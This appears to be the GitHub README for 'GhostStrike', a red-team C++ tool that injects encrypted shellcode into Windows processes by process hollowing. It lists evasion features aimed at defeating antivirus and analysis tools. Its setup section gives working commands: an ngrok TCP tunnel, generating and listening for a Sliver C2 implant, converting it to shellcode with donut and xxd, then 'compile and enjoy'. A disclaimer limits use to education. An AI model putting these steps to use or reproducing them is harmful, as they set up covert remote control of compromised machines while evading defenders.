Skip to content

Latest commit

 

History

History
54 lines (35 loc) · 3.08 KB

README.md

File metadata and controls

54 lines (35 loc) · 3.08 KB

GhostStrike ⚔️

GhostStrike is an advanced cybersecurity tool designed for Red Team operations, featuring sophisticated techniques to evade detection and perform process hollowing on Windows systems.


✨ Features

  • Dynamic API Resolution: Utilizes a custom hash-based method to dynamically resolve Windows APIs, avoiding detection by signature-based security tools.
  • Base64 Encoding/Decoding: Encodes and decodes shellcode to obscure its presence in memory, making it more difficult for static analysis tools to detect.
  • Cryptographic Key Generation: Generates secure cryptographic keys using Windows Cryptography APIs to encrypt and decrypt shellcode, adding an extra layer of protection.
  • XOR Encryption/Decryption: Simple but effective XOR-based encryption to protect the shellcode during its injection process.
  • Control Flow Flattening: Implements control flow flattening to obfuscate the execution path, complicating analysis by both static and dynamic analysis tools.
  • Process Hollowing: Injects encrypted shellcode into a legitimate Windows process, allowing it to execute covertly without raising suspicions.

⚙️ Configuration

You can configure GhostStrike with the following steps:

  1. Create Ngrok Service: ngrok tcp 443
  2. Generate Sliver C2 Implant: generate --mtls x.tcp.ngrok.io --save YourFile.exe
  3. Create Listener: mtls --lhost 0.0.0.0 --lport 443
  4. Convert to .bin: ./donut -i /home/YourUser/YourFile.exe -a 2 -f 1 -o /home/YourUser/YourFile.bin
  5. Convert to C++ Shellcode: xxd -i YourFile.bin > YourFile.h
  6. Import YourFile.h to this code
  7. Compile and enjoy! 🚀

💻 Requirements

  • C++ Compiler: Any modern C++ compiler, such as g++, clang++, or Visual Studio, is sufficient to compile the code.

No additional dependencies are needed to build GhostStrike. Simply compile the source code with your preferred C++ compiler, and you're ready to go!


⚠️ Disclaimer

This tool is intended solely for educational purposes and for use in controlled environments. Unauthorized use of GhostStrike outside of these settings is strictly prohibited. The author, @Stiven.Hacker, takes no responsibility for any misuse or damage caused by this code.


🎥 Demo

Check out a live demonstration of GhostStrike in action on LinkedIn:

Watch Demo